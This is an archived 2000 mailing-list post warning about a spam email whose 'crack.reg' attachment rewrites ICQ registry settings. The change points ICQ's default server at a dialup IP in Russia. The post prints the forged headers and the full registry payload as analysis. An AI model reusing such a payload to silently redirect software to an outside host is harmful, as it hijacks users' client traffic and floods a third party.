Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: CRACK

From: oogali () INTRANOVA NET (Omachonu Ogali)
Date: Thu, 25 May 2000 09:45:31 -0400

Yesterday, an e-mail was sent to a mailing list I'm subscribed to with a
subject of 'CRACK' and an attachment of 'crack.reg', after looking into
it, you can see that the headers were forged, and the attachment edits
your ICQ preferences in the registry and makes your default server a
dialup victim/client in Russia.

Headers:
-- snip --
Return-Path: <owner-freebsd-jobs () FreeBSD ORG>
Delivered-To: oogali () hydrant intranova net
Received: from intranova.net (blacklisted.intranova.net [209.3.31.70])
        by hydrant.intranova.net (Postfix) with SMTP id 33F73E1368
        for <oogali () hydrant intranova net>; Thu, 25 May 2000 00:12:21 -0400
Received: (qmail 14575 invoked by uid 1001); 24 May 2000 21:03:15 -0000
Delivered-To: oogali () intranova net
Received: (qmail 14567 invoked from network); 24 May 2000 21:03:14 -0000
Received: from hub.freebsd.org (204.216.27.18)
  by blacklisted.intranova.net with SMTP; 24 May 2000 21:03:14 -0000
Received: by hub.freebsd.org (Postfix, from userid 538)
        id 0698B37B710; Wed, 24 May 2000 14:04:19 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1])
        by hub.freebsd.org (Postfix) with SMTP
        id 004672E8163; Wed, 24 May 2000 14:04:18 -0700 (PDT)
        (envelope-from owner-freebsd-jobs)
Received: by hub.freebsd.org (bulk_mailer v1.12); Wed,
     24 May 2000 14:04:18 -0700
Delivered-To: freebsd-jobs () freebsd org
Received: from demos.su (mx.demos.su [194.87.0.32])
        by hub.freebsd.org (Postfix) with ESMTP id EC47637BD6F
        for <jobs () freebsd org>; Wed, 24 May 2000 14:04:12 -0700 (PDT)
        (envelope-from ppbsereb%geisteskrank.demos.su () sinbin demos su)
Received: from sinbin.demos.su ([194.87.5.31] verified)
  by demos.su (CommuniGate Pro SMTP 3.2.4)
  with SMTP id 6364870 for jobs () freebsd org; Thu, 25 May 2000 01:04:10 +0400
Received: from geisteskrank.demos.su by sinbin.demos.su with ESMTP id BAA44176;
        (8.6.12/D) Thu, 25 May 2000 01:03:03 +0400
Received: from rcomputer by geisteskrank.demos.su with SMTP id BAA61511;
  (8.9.3/D) Thu, 25 May 2000 01:02:32 +0400 (MSD)
Message-Id: <200005242102.BAA61511 () geisteskrank demos su>
From: "zulti () hotmail com" <zulti () hotmail com>
To: <jobs () freebsd org>
Subject: CRACK
Date: Thu, 25 May 2000 01:01:38  ^? ()
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="----=_NextPart_000_01F6_01BF2E09.23F97E80"
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: 'WE' Group Spamer
Sender: owner-freebsd-jobs () FreeBSD ORG
X-Loop: FreeBSD.org
Precedence: bulk
-- snip --

Attachment:
-- snip --
REGEDIT4
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs]
"Default Server Port"=dword:00001446
"Default Server Host"="195.133.10.234"
-- snip --

-- snip --
Server:  localhost.intranova.net
Address:  127.0.0.1

Name:    234.10.133.195.dynamic.dialup.ru
Address:  195.133.10.234
-- snip --

Once again, the problem here is people opening attachments without taking
a look at them.  Thank God this isn't a self-replicating e-mail, but it
presents a Denial-of-Service attack against this Russian dialup. In
conclusion...heads up!

--
+-------------------------------------------------------------------------+
| Omachonu Ogali                                     oogali () intranova net |
| Intranova Networking Group                 http://tribune.intranova.net |
| PGP Key ID:                                                  0xBFE60839 |
| PGP Fingerprint:       C8 51 14 FD 2A 87 53 D1  E3 AA 12 12 01 93 BD 34 |
+-------------------------------------------------------------------------+
Previous By Date Next
Previous By Thread Next

Current thread: